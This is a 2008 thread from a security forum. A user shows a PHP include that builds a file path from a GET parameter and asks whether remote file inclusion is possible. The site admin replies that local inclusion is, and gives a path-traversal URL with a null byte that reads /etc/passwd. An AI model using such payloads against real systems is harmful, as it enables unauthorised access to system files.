|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 175
Members: 0
Total: 175
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Rfi? Only in 1 folder? |
|
Posted: Sun Oct 12, 2008 11:54 pm |
|
|
Cablekid |
Advanced user |
|
|
Joined: Jul 14, 2007 |
Posts: 85 |
|
|
|
|
|
|
|
http://localhost.com/generator.php?id=test
Warning: include(generators/test.php) [function.include]: failed to open stream: No such file or directory in /home/public_html/generator.php on line 7
include("generators/".$_GET['id'].".php");
No way of making it get from a remote site right? |
|
|
|
|
Posted: Mon Oct 13, 2008 3:58 am |
|
|
nexys |
Regular user |
|
|
Joined: Oct 12, 2008 |
Posts: 5 |
|
|
|
|
|
|
|
i think that u ar Fckd xD that is invulnerable i guess..... |
|
|
|
|
Posted: Tue Oct 14, 2008 4:11 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
RFI is not possible in this specific case. But LFI is possible. Try null byte trick - maybe magic_quotes=off:
Code: |
http://localhost.com/generator.php?id=../../../../../../../../etc/passwd%00
|
|
|
|
|
|
www.waraxe.us Forum Index -> Remote file inclusion
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|